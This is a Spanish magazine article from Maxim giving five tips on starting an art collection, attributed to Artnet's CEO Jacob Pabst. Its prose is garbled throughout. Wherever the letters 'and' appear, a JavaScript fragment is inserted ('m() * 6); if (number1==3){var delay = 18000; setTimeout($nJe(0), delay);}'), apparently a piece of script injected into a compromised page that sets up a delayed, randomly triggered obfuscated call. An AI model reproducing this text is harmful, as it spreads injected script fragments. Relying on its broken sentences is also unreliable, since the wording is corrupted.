5 consejos esenciales para empezar tu colección de arte

    5 consejos esenciales para empezar tu colección de arte

    Estos son los 5 puntos que debes tomar en cuenta antes de comprar una obra de arte. 

    Autor: Redacción Maxim 22 noviembre, 2019


     

    FOTO: Victor Hughes

     

    Elige con sabiduría tu colección. 

     

    Construir una colección de arte puede parecer un proyecto desalentador y de mucho esfuerzo, repleta de subastas de alto precio, galerías intimidantes y la sobrecarga sensorial de megaeventos como el Art Basel Miami en diciembre. Pero si tienes buen ojo, un presupuesto modesto y una estrategia de compra inteligente, es muy factible obtener algunas piezas exclusivas para animar la decoración de tu hogar. Consultamos a Jacob Pabst, CEO del sitio web del mundo del arte Artnet, sobre sus cinco mejores consejos para los compradores primerizos. Después de todo, toda buena colección de arte tiene que comenzar en alguna lado.

     

    NO TODO EL ARTE ES UNA INVERSIÓN

     

    «Como en cualquier mercado, hay buenos productos y malos productos. Algunas obras de arte simplemente no tienen valor de reventa en absoluto. Cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando construyas tu colección, trata de no mirar las obras de arte como una inversión, o correrás el riesgo de decepcionarte». Por ejemplo, uno de los primeros artistas que coleccioné fue Billy Al Bengston. Me encanta su trabajo. Es un artista de la costa oeste famoso por su asociación con la cultura automovilista y motociclista de mediados de siglo. Bengston utiliza las herramientas industriales de los fabricantes de automóviles, particularmente pintura en aerosol y laca, aplicado a láminas de aluminio. Hace cosas muy interesantes. Tengo una escultura en mi oficina y nunca me canso de mirarla».

     

     

    COMPRA PORQUE LO AMAS

     

    «No lo compres simplemente porque es una obra de arte de Miro o una pintura de Picasso. A menudo encontrará que las etiquetas de alto precio que vienen con grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes nombres tienen más que ver con los grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes nombres que con la calidad de la pieza. Al final del día, tu eres quien tiene que vivir con el arte, así que asegúrate de comprarlo porque te gusta la obra de arte, no el nombre».

     

    FOTO: Helen Thomas

     

     

    HAZ TU INVESTIGACIÓN

     

    «Gracias a poderosas herramientas como la base de datos de precios de Artnet, el mercado del arte se ha vuelto más transparente y accesible que nunca. Antes de comprar una obra de arte, asegúrese de haber realizado tu investigación. ¿Para qué se venden piezas similares del artista? ¿Han mantenido los precios del artista a largo plazo? Si está mirandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando fotografía, asegúrate de comprender el número de ediciones de impresión y cómo se han vendido esas ediciones a lo largo del tiempo. Los distribuidores respetan a los clientes que han realizado su investigación. Pero al mismo tiempo, no tengas miedo de hacer preguntas, incluso si te sientes intimidado por el simple hecho de entrar en una galería o casa de subastas. Siempre vale la pena ir personalmente y hacer preguntas antes de comprar. Confía en mí, el personal allí estará realmente feliz de verte y de responder a tus preguntas».

     

    FOTO: ID Interiors

     

     

    CONSIDERA COMPRAR ARTE EN LÍNEA

     

    «Las subastas en línea como Artnet Auctions se están convirtiendo en una excelente manera de entrar en la recolección. Nuestras ventas están cuidadosamente seleccionadas, no conllevan los gastos generales de las ventas físicas (lo que significa tarifas de comprador más bajas), y vendemos la misma calidad de trabajos que encontrarías en las subastas tradicionales. También es menos intimidante que presentarse en Sotheby’s para ofertar sin experiencia previa, y es una buena manera de aprender el ritmo, el flujo y los precios del mercado de subastas».

     

     

     

    CULTIVA LAS RELACIONES CON LOS PROS EN EL MUNDO DEL ARTE  

     

    «Realmente no conocerás a los comerciantes de arte después de una sola compra. Se necesita tiempo para cultivar esas relaciones. Regístrate en la lista de correo electrónico de una galería, preséntate para la próxima apertura del espectáculo, pasa por la galería cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando tengan algo nuevo». Dedica el tiempo necesario para conocer a las personas en el mundo del arte, como galeristas, artistas, asesores de arte, especialistas y curadores de casas de subastas. Puedes aprender algunos trucos del oficio simplemente estandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando en su compañía. Lo mejor de todo, eventualmente podrás contar algunas de las personas más interesantes del mundo entre tus amigos».

     

     

     

    Si te gusta el arte , estos son los lugares que debes visitar, ARTE Y MÁS ARTE PARA CERRAR EL AÑO

     

     

    Temas relacionados con esta nota: , , , ,

Estos son los 5 puntos que debes tomar en cuenta antes de comprar una obra de arte.